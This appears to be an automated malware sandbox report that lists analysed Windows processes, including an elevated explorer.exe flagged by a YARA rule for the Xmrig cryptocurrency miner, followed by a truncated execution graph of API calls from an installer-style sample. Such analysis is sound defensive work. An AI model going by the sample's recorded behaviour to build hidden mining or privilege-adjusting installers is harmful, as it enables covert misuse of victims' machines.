                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:67
                                                  Start time:19:34:51
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:68
                                                  Start time:19:34:51
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:69
                                                  Start time:19:34:51
                                                  Start date:29/06/2024
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:explorer.exe
                                                  Imagebase:0x7ff72b770000
                                                  File size:5'141'208 bytes
                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000045.00000002.4114240353.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  Has exited:false

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:13.5%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:16.6%
                                                    Total number of Nodes:1315
                                                    Total number of Limit Nodes:17
                                                    execution_graph 3467 401d44 3471 402bac 3467->3471 3469 401d52 SetWindowLongA 3470 402a5a 3469->3470 3472 40618a 17 API calls 3471->3472 3473 402bc1 3472->3473 3473->3469 3474 401ec5 3475 402bac 17 API calls 3474->3475 3476 401ecb 3475->3476 3477 402bac 17 API calls 3476->3477 3478 401ed7 3477->3478 3479 401ee3 ShowWindow 3478->3479 3480 401eee EnableWindow 3478->3480 3481 402a5a 3479->3481 3480->3481 3482 401746 3483 402bce 17 API calls 3482->3483 3484 40174d 3483->3484 3485 405cbf 2 API calls 3484->3485 3486 401754 3485->3486 3486->3486 3487 4045c6 3488 4045d6 3487->3488 3489 4045fc 3487->3489 3494 40417b 3488->3494 3497 4041e2 3489->3497 3492 4045e3 SetDlgItemTextA 3492->3489 3495 40618a 17 API calls 3494->3495 3496 404186 SetDlgItemTextA 3495->3496 3496->3492 3498 4042a5 3497->3498 3499 4041fa GetWindowLongA 3497->3499 3499->3498 3500 40420f 3499->3500 3500->3498 3501 40423c GetSysColor 3500->3501 3502 40423f 3500->3502 3501->3502 3503 404245 SetTextColor 3502->3503 3504 40424f SetBkMode 3502->3504 3503->3504 3505 404267 GetSysColor 3504->3505 3506 40426d 3504->3506 3505->3506 3507 404274 SetBkColor 3506->3507 3508 40427e 3506->3508 3507->3508 3508->3498 3509 404291 DeleteObject 3508->3509 3510 404298 CreateBrushIndirect 3508->3510 3509->3510 3510->3498 3511 401947 3512 402bce 17 API calls 3511->3512 3513 40194e lstrlenA 3512->3513 3514 402620 3513->3514 3072 403348 SetErrorMode GetVersion 3073 403389 3072->3073 3074 40338f 3072->3074 3075 406500 5 API calls 3073->3075 3162 406492 GetSystemDirectoryA 3074->3162 3075->3074 3077 4033a5 lstrlenA 3077->3074 3078 4033b4 3077->3078 3165 406500 GetModuleHandleA 3078->3165 3081 406500 5 API calls 3082 4033c2 3081->3082 3083 406500 5 API calls 3082->3083 3084 4033ce #17 OleInitialize SHGetFileInfoA 3083->3084 3171 4060f7 lstrcpynA 3084->3171 3087 40341a GetCommandLineA 3172 4060f7 lstrcpynA 3087->3172 3089 40342c 3090 405aba CharNextA 3089->3090 3091 403455 CharNextA 3090->3091 3101 403465 3091->3101 3092 40352f 3093 403542 GetTempPathA 3092->3093 3173 403317 3093->3173 3095 40355a 3096 4035b4 DeleteFileA 3095->3096 3097 40355e GetWindowsDirectoryA lstrcatA 3095->3097 3183 402ea1 GetTickCount GetModuleFileNameA 3096->3183 3099 403317 12 API calls 3097->3099 3098 405aba CharNextA 3098->3101 3102 40357a 3099->3102 3101->3092 3101->3098 3103 403531 3101->3103 3102->3096 3105 40357e GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3102->3105 3268 4060f7 lstrcpynA 3103->3268 3104 4035c8 3106 403662 ExitProcess OleUninitialize 3104->3106 3109 40364e 3104->3109 3116 405aba CharNextA 3104->3116 3108 403317 12 API calls 3105->3108 3110 403796 3106->3110 3111 403678 3106->3111 3114 4035ac 3108->3114 3211 40390a 3109->3211 3112 403818 ExitProcess 3110->3112 3113 40379e GetCurrentProcess OpenProcessToken 3110->3113 3271 405813 3111->3271 3118 4037e9 3113->3118 3119 4037b9 LookupPrivilegeValueA AdjustTokenPrivileges 3113->3119 3114->3096 3114->3106 3121 4035e3 3116->3121 3124 406500 5 API calls 3118->3124 3119->3118 3125 403629 3121->3125 3126 40368e 3121->3126 3127 4037f0 3124->3127 3129 405b7d 18 API calls 3125->3129 3275 40577e 3126->3275 3130 403805 ExitWindowsEx 3127->3130 3133 403811 3127->3133 3132 403634 3129->3132 3130->3112 3130->3133 3132->3106 3269 4060f7 lstrcpynA 3132->3269 3291 40140b 3133->3291 3134 4036a4 lstrcatA 3135 4036af lstrcatA lstrcmpiA 3134->3135 3135->3106 3137 4036cb 3135->3137 3139 4036d0 3137->3139 3140 4036d7 3137->3140 3278 4056e4 CreateDirectoryA 3139->3278 3283 405761 CreateDirectoryA 3140->3283 3141 403643 3270 4060f7 lstrcpynA 3141->3270 3146 4036dc SetCurrentDirectoryA 3147 4036f6 3146->3147 3148 4036eb 3146->3148 3287 4060f7 lstrcpynA 3147->3287 3286 4060f7 lstrcpynA 3148->3286 3151 40618a 17 API calls 3152 403735 DeleteFileA 3151->3152 3153 403742 CopyFileA 3152->3153 3159 403704 3152->3159 3153->3159 3154 40378a 3156 405ed6 36 API calls 3154->3156 3155 405ed6 36 API calls 3155->3159 3157 403791 3156->3157 3157->3106 3158 40618a 17 API calls 3158->3159 3159->3151 3159->3154 3159->3155 3159->3158 3161 403776 CloseHandle 3159->3161 3288 405796 CreateProcessA 3159->3288 3161->3159 3163 4064b4 wsprintfA LoadLibraryExA 3162->3163 3163->3077 3166 406526 GetProcAddress 3165->3166 3167 40651c 3165->3167 3169 4033bb 3166->3169 3168 406492 3 API calls 3167->3168 3170 406522 3168->3170 3169->3081 3170->3166 3170->3169 3171->3087 3172->3089 3174 4063d2 5 API calls 3173->3174 3176 403323 3174->3176 3175 40332d 3175->3095 3176->3175 3177 405a8f 3 API calls 3176->3177 3178 403335 3177->3178 3179 405761 2 API calls 3178->3179 3180 40333b 3179->3180 3294 405cbf 3180->3294 3298 405c90 GetFileAttributesA CreateFileA 3183->3298 3185 402ee1 3205 402ef1 3185->3205 3299 4060f7 lstrcpynA 3185->3299 3187 402f07 3188 405ad6 2 API calls 3187->3188 3189 402f0d 3188->3189 3300 4060f7 lstrcpynA 3189->3300 3191 402f18 GetFileSize 3192 403012 3191->3192 3193 402f2f 3191->3193 3301 402e3d 3192->3301 3193->3192 3198 40307e 3193->3198 3193->3205 3207 402e3d 6 API calls 3193->3207 3333 4032ea 3193->3333 3195 40301b 3197 40304b GlobalAlloc 3195->3197 3195->3205 3336 403300 SetFilePointer 3195->3336 3312 403300 SetFilePointer 3197->3312 3202 402e3d 6 API calls 3198->3202 3201 403066 3313 4030d8 3201->3313 3202->3205 3203 403034 3206 4032ea ReadFile 3203->3206 3205->3104 3208 40303f 3206->3208 3207->3193 3208->3197 3208->3205 3210 4030af SetFilePointer 3210->3205 3212 406500 5 API calls 3211->3212 3213 40391e 3212->3213 3214 403924 GetUserDefaultUILanguage 3213->3214 3215 403936 3213->3215 3342 406055 wsprintfA 3214->3342 3217 405fde 3 API calls 3215->3217 3218 403961 3217->3218 3220 40397f lstrcatA 3218->3220 3221 405fde 3 API calls 3218->3221 3219 403934 3343 403bcf 3219->3343 3220->3219 3221->3220 3224 405b7d 18 API calls 3225 4039b1 3224->3225 3226 403a3a 3225->3226 3228 405fde 3 API calls 3225->3228 3227 405b7d 18 API calls 3226->3227 3231 403a40 3227->3231 3229 4039dd 3228->3229 3229->3226 3237 4039f9 lstrlenA 3229->3237 3241 405aba CharNextA 3229->3241 3230 403a50 LoadImageA 3232 403af6 3230->3232 3233 403a77 RegisterClassA 3230->3233 3231->3230 3234 40618a 17 API calls 3231->3234 3236 40140b 2 API calls 3232->3236 3235 403aad SystemParametersInfoA CreateWindowExA 3233->3235 3267 40365e 3233->3267 3234->3230 3235->3232 3240 403afc 3236->3240 3238 403a07 lstrcmpiA 3237->3238 3239 403a2d 3237->3239 3238->3239 3243 403a17 GetFileAttributesA 3238->3243 3244 405a8f 3 API calls 3239->3244 3246 403bcf 18 API calls 3240->3246 3240->3267 3242 4039f7 3241->3242 3242->3237 3245 403a23 3243->3245 3247 403a33 3244->3247 3245->3239 3248 405ad6 2 API calls 3245->3248 3249 403b0d 3246->3249 3351 4060f7 lstrcpynA 3247->3351 3248->3239 3251 403b19 ShowWindow 3249->3251 3252 403b9c 3249->3252 3254 406492 3 API calls 3251->3254 3352 4052f0 OleInitialize 3252->3352 3256 403b31 3254->3256 3255 403ba2 3257 403ba6 3255->3257 3258 403bbe 3255->3258 3259 403b3f GetClassInfoA 3256->3259 3263 406492 3 API calls 3256->3263 3265 40140b 2 API calls 3257->3265 3257->3267 3262 40140b 2 API calls 3258->3262 3260 403b53 GetClassInfoA RegisterClassA 3259->3260 3261 403b69 DialogBoxParamA 3259->3261 3260->3261 3264 40140b 2 API calls 3261->3264 3262->3267 3263->3259 3266 403b91 3264->3266 3265->3267 3266->3267 3267->3106 3268->3093 3269->3141 3270->3109 3272 405828 3271->3272 3273 403686 ExitProcess 3272->3273 3274 40583c MessageBoxIndirectA 3272->3274 3274->3273 3276 406500 5 API calls 3275->3276 3277 403693 lstrcatA 3276->3277 3277->3134 3277->3135 3279 4036d5 3278->3279 3280 405735 GetLastError 3278->3280 3279->3146 3280->3279 3281 405744 SetFileSecurityA 3280->3281 3281->3279 3282 40575a GetLastError 3281->3282 3282->3279 3284 405771 3283->3284 3285 405775 GetLastError 3283->3285 3284->3146 3285->3284 3286->3147 3287->3159 3289 4057d5 3288->3289 3290 4057c9 CloseHandle 3288->3290 3289->3159 3290->3289 3292 401389 2 API calls 3291->3292 3293 401420 3292->3293 3293->3112 3295 405cca GetTickCount GetTempFileNameA 3294->3295 3296 403346 3295->3296 3297 405cf7 3295->3297 3296->3095 3297->3295 3297->3296 3298->3185 3299->3187 3300->3191 3302 402e46 3301->3302 3303 402e5e 3301->3303 3306 402e56 3302->3306 3307 402e4f DestroyWindow 3302->3307 3304 402e66 3303->3304 3305 402e6e GetTickCount 3303->3305 3337 40653c 3304->3337 3309 402e7c CreateDialogParamA ShowWindow 3305->3309 3310 402e9f 3305->3310 3306->3195 3307->3306 3309->3310 3310->3195 3312->3201 3314 4030ee 3313->3314 3315 40311c 3314->3315 3341 403300 SetFilePointer 3314->3341 3317 4032ea ReadFile 3315->3317 3318 403127 3317->3318 3319 403283 3318->3319 3320 403139 GetTickCount 3318->3320 3327 403072 3318->3327 3321 4032c5 3319->3321 3326 403287 3319->3326 3320->3327 3332 403188 3320->3332 3322 4032ea ReadFile 3321->3322 3322->3327 3323 4032ea ReadFile 3323->3332 3324 4032ea ReadFile 3324->3326 3325 405d37 WriteFile 3325->3326 3326->3324 3326->3325 3326->3327 3327->3205 3327->3210 3328 4031de GetTickCount 3328->3332 3329 403203 MulDiv wsprintfA 3330 40521e 24 API calls 3329->3330 3330->3332 3331 405d37 WriteFile 3331->3332 3332->3323 3332->3327 3332->3328 3332->3329 3332->3331 3334 405d08 ReadFile 3333->3334 3335 4032fd 3334->3335 3335->3193 3336->3203 3338 406559 PeekMessageA 3337->3338 3339 402e6c 3338->3339 3340 40654f DispatchMessageA 3338->3340 3339->3195 3340->3338 3341->3315 3342->3219 3344 403be3 3343->3344 3359 406055 wsprintfA 3344->3359 3346 403c54 3360 403c88 3346->3360 3348 40398f 3348->3224 3349 403c59 3349->3348 3350 40618a 17 API calls 3349->3350 3350->3349 3351->3226 3363 4041c7 3352->3363 3354 405313 3358 40533a 3354->3358 3366 401389 3354->3366 3355 4041c7 SendMessageA 3356 40534c OleUninitialize 3355->3356 3356->3255 3358->3355 3359->3346 3361 40618a 17 API calls 3360->3361 3362 403c96 SetWindowTextA 3361->3362 3362->3349 3364 4041d0 SendMessageA 3363->3364 3365 4041df 3363->3365 3364->3365 3365->3354 3368 401390 3366->3368 3367 4013fe 3367->3354 3368->3367 3369 4013cb MulDiv SendMessageA 3368->3369 3369->3368 3515 4038c8 3516 4038d3 3515->3516 3517 4038d7 3516->3517 3518 4038da GlobalAlloc 3516->3518 3518->3517 3522 401fcb 3523 402bce 17 API calls 3522->3523 3524 401fd2 3523->3524 3525 40646b 2 API calls 3524->3525 3526 401fd8 3525->3526 3528 401fea 3526->3528 3529 406055 wsprintfA 3526->3529 3529->3528 3530 4014d6 3531 402bac 17 API calls 3530->3531 3532 4014dc Sleep 3531->3532 3534 402a5a 3532->3534 3370 401759 3409 402bce 3370->3409 3372 401760 3373 401786 3372->3373 3374 40177e 3372->3374 3417 4060f7 lstrcpynA 3373->3417 3416 4060f7 lstrcpynA 3374->3416 3377 401791 3379 405a8f 3 API calls 3377->3379 3378 401784 3381 4063d2 5 API calls 3378->3381 3380 401797 lstrcatA 3379->3380 3380->3378 3386 4017a3 3381->3386 3382 4017ae 3383 40646b 2 API calls 3382->3383 3382->3386 3387 4017ba CompareFileTime 3382->3387 3383->3382 3385 405c6b 2 API calls 3385->3386 3386->3382 3386->3385 3388 40187e 3386->3388 3393 4060f7 lstrcpynA 3386->3393 3396 40618a 17 API calls 3386->3396 3405 405813 MessageBoxIndirectA 3386->3405 3407 401855 3386->3407 3415 405c90 GetFileAttributesA CreateFileA 3386->3415 3387->3382 3389 40521e 24 API calls 3388->3389 3391 401888 3389->3391 3390 40521e 24 API calls 3408 40186a 3390->3408 3392 4030d8 31 API calls 3391->3392 3394 40189b 3392->3394 3393->3386 3395 4018af SetFileTime 3394->3395 3397 4018c1 FindCloseChangeNotification 3394->3397 3395->3397 3396->3386 3398 4018d2 3397->3398 3397->3408 3399 4018d7 3398->3399 3400 4018ea 3398->3400 3401 40618a 17 API calls 3399->3401 3402 40618a 17 API calls 3400->3402 3403 4018df lstrcatA 3401->3403 3404 4018f2 3402->3404 3403->3404 3406 405813 MessageBoxIndirectA 3404->3406 3405->3386 3406->3408 3407->3390 3407->3408 3410 402bda 3409->3410 3411 40618a 17 API calls 3410->3411 3412 402bfb 3411->3412 3413 402c07 3412->3413 3414 4063d2 5 API calls 3412->3414 3413->3372 3414->3413 3415->3386 3416->3378 3417->3377 3535 401959 3536 402bac 17 API calls 3535->3536 3537 401960 3536->3537 3538 402bac 17 API calls 3537->3538 3539 40196d 3538->3539 3540 402bce 17 API calls 3539->3540 3541 401984 lstrlenA 3540->3541 3543 401994 3541->3543 3542 4019d4 3543->3542 3547 4060f7 lstrcpynA 3543->3547 3545 4019c4 3545->3542 3546 4019c9 lstrlenA 3545->3546 3546->3542 3547->3545 3548 40535c 3549 405507 3548->3549 3550 40537e GetDlgItem GetDlgItem GetDlgItem 3548->3550 3552 40550f GetDlgItem CreateThread CloseHandle 3549->3552 3555 405537 3549->3555 3593 4041b0 SendMessageA 3550->3593 3552->3555 3553 4053ee 3560 4053f5 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3553->3560 3554 405565 3558 4055c0 3554->3558 3562 405575 3554->3562 3563 405599 ShowWindow 3554->3563 3555->3554 3556 405586 3555->3556 3557 40554d ShowWindow ShowWindow 3555->3557 3559 4041e2 8 API calls 3556->3559 3595 4041b0 SendMessageA 3557->3595 3558->3556 3569 4055cd SendMessageA 3558->3569 3564 405592 3559->3564 3567 405463 3560->3567 3568 405447 SendMessageA SendMessageA 3560->3568 3596 404154 3562->3596 3565 4055b9 3563->3565 3566 4055ab 3563->3566 3572 404154 SendMessageA 3565->3572 3571 40521e 24 API calls 3566->3571 3573 405476 3567->3573 3574 405468 SendMessageA 3567->3574 3568->3567 3569->3564 3575 4055e6 CreatePopupMenu 3569->3575 3571->3565 3572->3558 3577 40417b 18 API calls 3573->3577 3574->3573 3576 40618a 17 API calls 3575->3576 3578 4055f6 AppendMenuA 3576->3578 3579 405486 3577->3579 3580 405614 GetWindowRect 3578->3580 3581 405627 TrackPopupMenu 3578->3581 3582 4054c3 GetDlgItem SendMessageA 3579->3582 3583 40548f ShowWindow 3579->3583 3580->3581 3581->3564 3584 405643 3581->3584 3582->3564 3587 4054ea SendMessageA SendMessageA 3582->3587 3585 4054b2 3583->3585 3586 4054a5 ShowWindow 3583->3586 3588 405662 SendMessageA 3584->3588 3594 4041b0 SendMessageA 3585->3594 3586->3585 3587->3564 3588->3588 3589 40567f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3588->3589 3591 4056a1 SendMessageA 3589->3591 3591->3591 3592 4056c3 GlobalUnlock SetClipboardData CloseClipboard 3591->3592 3592->3564 3593->3553 3594->3582 3595->3554 3597 404161 SendMessageA 3596->3597 3598 40415b 3596->3598 3597->3556 3598->3597 3599 40275d 3600 402763 3599->3600 3601 402a5a 3600->3601 3602 40276b FindClose 3600->3602 3602->3601 3603 40495e 3604 40498a 3603->3604 3605 40496e 3603->3605 3607 404990 SHGetPathFromIDListA 3604->3607 3608 4049bd 3604->3608 3614 4057f7 GetDlgItemTextA 3605->3614 3610 4049a0 3607->3610 3611 4049a7 SendMessageA 3607->3611 3609 40497b SendMessageA 3609->3604 3612 40140b 2 API calls 3610->3612 3611->3608 3612->3611 3614->3609 3615 401a5e 3616 402bac 17 API calls 3615->3616 3617 401a67 3616->3617 3618 402bac 17 API calls 3617->3618 3619 401a0e 3618->3619 3620 4029de 3621 406500 5 API calls 3620->3621 3622 4029e5 3621->3622 3623 402bce 17 API calls 3622->3623 3624 4029ee 3623->3624 3626 402a2a 3624->3626 3630 40614a 3624->3630 3627 4029fc 3627->3626 3634 406134 3627->3634 3631 406155 3630->3631 3632 406178 IIDFromString 3631->3632 3633 406171 3631->3633 3632->3627 3633->3627 3637 406119 WideCharToMultiByte 3634->3637 3636 402a1d CoTaskMemFree 3636->3626 3637->3636 3638 4027df 3639 402bce 17 API calls 3638->3639 3641 4027ed 3639->3641 3640 402803 3643 405c6b 2 API calls 3640->3643 3641->3640 3642 402bce 17 API calls 3641->3642 3642->3640 3644 402809 3643->3644 3666 405c90 GetFileAttributesA CreateFileA 3644->3666 3646 402816 3647 402822 GlobalAlloc 3646->3647 3648 4028bf 3646->3648 3649 4028b6 CloseHandle 3647->3649 3650 40283b 3647->3650 3651 4028c7 DeleteFileA 3648->3651 3652 4028da 3648->3652 3649->3648 3667 403300 SetFilePointer 3650->3667 3651->3652 3654 402841 3655 4032ea ReadFile 3654->3655 3656 40284a GlobalAlloc 3655->3656 3657 402894 3656->3657 3658 40285a 3656->3658 3659 405d37 WriteFile 3657->3659 3660 4030d8 31 API calls 3658->3660 3661 4028a0 GlobalFree 3659->3661 3663 402867 3660->3663 3662 4030d8 31 API calls 3661->3662 3664 4028b3 3662->3664 3665 40288b GlobalFree 3663->3665 3664->3649 3665->3657 3666->3646 3667->3654 3668 4023e0 3669 402bce 17 API calls 3668->3669 3670 4023f1 3669->3670 3671 402bce 17 API calls 3670->3671 3672 4023fa 3671->3672 3673 402bce 17 API calls 3672->3673 3674 402404 GetPrivateProfileStringA 3673->3674 3675 4028e0 3676 402bac 17 API calls 3675->3676 3677 4028e6 3676->3677 3678 402925 3677->3678 3679 40290e 3677->3679 3684 4027bf 3677->3684 3682 40293f 3678->3682 3683 40292f 3678->3683 3680 402922 3679->3680 3681 402913 3679->3681 3680->3684 3690 406055 wsprintfA 3680->3690 3689 4060f7 lstrcpynA 3681->3689 3686 40618a 17 API calls 3682->3686 3685 402bac 17 API calls 3683->3685 3685->3680 3686->3680 3689->3684 3690->3684 3691 401b63 3692 402bce 17 API calls 3691->3692 3693 401b6a 3692->3693 3694 402bac 17 API calls 3693->3694 3695 401b73 wsprintfA 3694->3695 3696 402a5a 3695->3696 3697 401d65 3698 401d78 GetDlgItem 3697->3698 3699 401d6b 3697->3699 3701 401d72 3698->3701 3700 402bac 17 API calls 3699->3700 3700->3701 3702 401db9 GetClientRect LoadImageA SendMessageA 3701->3702 3703 402bce 17 API calls 3701->3703 3705 401e1a 3702->3705 3707 401e26 3702->3707 3703->3702 3706 401e1f DeleteObject 3705->3706 3705->3707 3706->3707 3708 4042e6 3709 4042fc 3708->3709 3714 404408 3708->3714 3712 40417b 18 API calls 3709->3712 3710 404477 3711 404541 3710->3711 3713 404481 GetDlgItem 3710->3713 3720 4041e2 8 API calls 3711->3720 3715 404352 3712->3715 3716 404497 3713->3716 3717 4044ff 3713->3717 3714->3710 3714->3711 3718 40444c GetDlgItem SendMessageA 3714->3718 3719 40417b 18 API calls 3715->3719 3716->3717 3724 4044bd SendMessageA LoadCursorA SetCursor 3716->3724 3717->3711 3721 404511 3717->3721 3741 40419d EnableWindow 3718->3741 3723 40435f CheckDlgButton 3719->3723 3731 40453c 3720->3731 3726 404517 SendMessageA 3721->3726 3727 404528 3721->3727 3739 40419d EnableWindow 3723->3739 3745 40458a 3724->3745 3726->3727 3727->3731 3732 40452e SendMessageA 3727->3732 3728 404472 3742 404566 3728->3742 3732->3731 3734 40437d GetDlgItem 3740 4041b0 SendMessageA 3734->3740 3736 404393 SendMessageA 3737 4043b1 GetSysColor 3736->3737 3738 4043ba SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3736->3738 3737->3738 3738->3731 3739->3734 3740->3736 3741->3728 3743 404574 3742->3743 3744 404579 SendMessageA 3742->3744 3743->3744 3744->3710 3748 4057d9 ShellExecuteExA 3745->3748 3747 4044f0 LoadCursorA SetCursor 3747->3717 3748->3747 3749 40166a 3750 402bce 17 API calls 3749->3750 3751 401671 3750->3751 3752 402bce 17 API calls 3751->3752 3753 40167a 3752->3753 3754 402bce 17 API calls 3753->3754 3755 401683 MoveFileA 3754->3755 3756 401696 3755->3756 3757 40168f 3755->3757 3758 40646b 2 API calls 3756->3758 3761 4022e2 3756->3761 3759 401423 24 API calls 3757->3759 3760 4016a5 3758->3760 3759->3761 3760->3761 3762 405ed6 36 API calls 3760->3762 3762->3757 3763 40216b 3764 402bce 17 API calls 3763->3764 3765 402172 3764->3765 3766 402bce 17 API calls 3765->3766 3767 40217c 3766->3767 3768 402bce 17 API calls 3767->3768 3769 402186 3768->3769 3770 402bce 17 API calls 3769->3770 3771 402193 3770->3771 3772 402bce 17 API calls 3771->3772 3773 40219d 3772->3773 3774 4021df CoCreateInstance 3773->3774 3775 402bce 17 API calls 3773->3775 3778 4021fe 3774->3778 3780 4022ac 3774->3780 3775->3774 3776 401423 24 API calls 3777 4022e2 3776->3777 3779 40228c MultiByteToWideChar 3778->3779 3778->3780 3779->3780 3780->3776 3780->3777 3781 4022eb 3782 402bce 17 API calls 3781->3782 3783 4022f1 3782->3783 3784 402bce 17 API calls 3783->3784 3785 4022fa 3784->3785 3786 402bce 17 API calls 3785->3786 3787 402303 3786->3787 3788 40646b 2 API calls 3787->3788 3789 40230c 3788->3789 3790 40231d lstrlenA lstrlenA 3789->3790 3794 402310 3789->3794 3792 40521e 24 API calls 3790->3792 3791 40521e 24 API calls 3795 402318 3791->3795 3793 402359 SHFileOperationA 3792->3793 3793->3794 3793->3795 3794->3791 3794->3795 3796 40236d 3797 402374 3796->3797 3801 402387 3796->3801 3798 40618a 17 API calls 3797->3798 3799 402381 3798->3799 3800 405813 MessageBoxIndirectA 3799->3800 3800->3801 3802 40266d 3803 402bac 17 API calls 3802->3803 3804 402677 3803->3804 3805 405d08 ReadFile 3804->3805 3806 4026e7 3804->3806 3808 4026f7 3804->3808 3810 4026e5 3804->3810 3805->3804 3811 406055 wsprintfA 3806->3811 3809 40270d SetFilePointer 3808->3809 3808->3810 3809->3810 3811->3810 3812 4019ed 3813 402bce 17 API calls 3812->3813 3814 4019f4 3813->3814 3815 402bce 17 API calls 3814->3815 3816 4019fd 3815->3816 3817 401a04 lstrcmpiA 3816->3817 3818 401a16 lstrcmpA 3816->3818 3819 401a0a 3817->3819 3818->3819 3820 40296e 3821 402bac 17 API calls 3820->3821 3822 402974 3821->3822 3823 4029af 3822->3823 3825 4027bf 3822->3825 3826 402986 3822->3826 3824 40618a 17 API calls 3823->3824 3823->3825 3824->3825 3826->3825 3828 406055 wsprintfA 3826->3828 3828->3825 3829 4014f4 SetForegroundWindow 3830 402a5a 3829->3830 3831 402476 3832 402bce 17 API calls 3831->3832 3833 402488 3832->3833 3834 402bce 17 API calls 3833->3834 3835 402492 3834->3835 3848 402c5e 3835->3848 3838 402a5a 3839 4024c7 3841 4024d3 3839->3841 3844 402bac 17 API calls 3839->3844 3840 402bce 17 API calls 3843 4024c0 lstrlenA 3840->3843 3842 4024f5 RegSetValueExA 3841->3842 3845 4030d8 31 API calls 3841->3845 3846 40250b RegCloseKey 3842->3846 3843->3839 3844->3841 3845->3842 3846->3838 3849 402c79 3848->3849 3852 405fab 3849->3852 3853 405fba 3852->3853 3854 4024a2 3853->3854 3855 405fc5 RegCreateKeyExA 3853->3855 3854->3838 3854->3839 3854->3840 3855->3854 3856 402777 3857 40277d 3856->3857 3858 402781 FindNextFileA 3857->3858 3860 402793 3857->3860 3859 4027d2 3858->3859 3858->3860 3862 4060f7 lstrcpynA 3859->3862 3862->3860 3863 401ef9 3864 402bce 17 API calls 3863->3864 3865 401eff 3864->3865 3866 402bce 17 API calls 3865->3866 3867 401f08 3866->3867 3868 402bce 17 API calls 3867->3868 3869 401f11 3868->3869 3870 402bce 17 API calls 3869->3870 3871 401f1a 3870->3871 3872 401423 24 API calls 3871->3872 3873 401f21 3872->3873 3880 4057d9 ShellExecuteExA 3873->3880 3875 401f5c 3876 406575 5 API calls 3875->3876 3877 4027bf 3875->3877 3878 401f76 CloseHandle 3876->3878 3878->3877 3880->3875 3422 401f7b 3423 402bce 17 API calls 3422->3423 3424 401f81 3423->3424 3425 40521e 24 API calls 3424->3425 3426 401f8b 3425->3426 3427 405796 2 API calls 3426->3427 3428 401f91 3427->3428 3429 401fb2 CloseHandle 3428->3429 3433 4027bf 3428->3433 3437 406575 WaitForSingleObject 3428->3437 3429->3433 3432 401fa6 3434 401fb4 3432->3434 3435 401fab 3432->3435 3434->3429 3442 406055 wsprintfA 3435->3442 3438 40658f 3437->3438 3439 4065a1 GetExitCodeProcess 3438->3439 3440 40653c 2 API calls 3438->3440 3439->3432 3441 406596 WaitForSingleObject 3440->3441 3441->3438 3442->3429 3881 401ffb 3882 402bce 17 API calls 3881->3882 3883 402002 3882->3883 3884 406500 5 API calls 3883->3884 3885 402011 3884->3885 3886 402029 GlobalAlloc 3885->3886 3887 402091 3885->3887 3886->3887 3888 40203d 3886->3888 3889 406500 5 API calls 3888->3889 3890 402044 3889->3890 3891 406500 5 API calls 3890->3891 3892 40204e 3891->3892 3892->3887 3896 406055 wsprintfA 3892->3896 3894 402085 3897 406055 wsprintfA 3894->3897 3896->3894 3897->3887 3898 4018fd 3899 401934 3898->3899 3900 402bce 17 API calls 3899->3900 3901 401939 3900->3901 3902 4058bf 67 API calls 3901->3902 3903 401942 3902->3903 3904 401000 3905 401037 BeginPaint GetClientRect 3904->3905 3906 40100c DefWindowProcA 3904->3906 3908 4010f3 3905->3908 3911 401179 3906->3911 3909 401073 CreateBrushIndirect FillRect DeleteObject 3908->3909 3910 4010fc 3908->3910 3909->3908 3912 401102 CreateFontIndirectA 3910->3912 3913 401167 EndPaint 3910->3913 3912->3913 3914 401112 6 API calls 3912->3914 3913->3911 3914->3913 3915 401900 3916 402bce 17 API calls 3915->3916 3917 401907 3916->3917 3918 405813 MessageBoxIndirectA 3917->3918 3919 401910 3918->3919 3920 404b80 GetDlgItem GetDlgItem 3921 404bd6 7 API calls 3920->3921 3928 404dfd 3920->3928 3922 404c72 SendMessageA 3921->3922 3923 404c7e DeleteObject 3921->3923 3922->3923 3924 404c89 3923->3924 3926 404cc0 3924->3926 3929 40618a 17 API calls 3924->3929 3925 404edf 3927 404f8b 3925->3927 3937 404f38 SendMessageA 3925->3937 3963 404df0 3925->3963 3930 40417b 18 API calls 3926->3930 3933 404f95 SendMessageA 3927->3933 3934 404f9d 3927->3934 3928->3925 3932 404e6c 3928->3932 3974 404ace SendMessageA 3928->3974 3935 404ca2 SendMessageA SendMessageA 3929->3935 3931 404cd4 3930->3931 3936 40417b 18 API calls 3931->3936 3932->3925 3938 404ed1 SendMessageA 3932->3938 3933->3934 3944 404fb6 3934->3944 3945 404faf ImageList_Destroy 3934->3945 3949 404fc6 3934->3949 3935->3924 3952 404ce5 3936->3952 3942 404f4d SendMessageA 3937->3942 3937->3963 3938->3925 3939 4041e2 8 API calls 3943 40518b 3939->3943 3941 40513f 3950 405151 ShowWindow GetDlgItem ShowWindow 3941->3950 3941->3963 3948 404f60 3942->3948 3946 404fbf GlobalFree 3944->3946 3944->3949 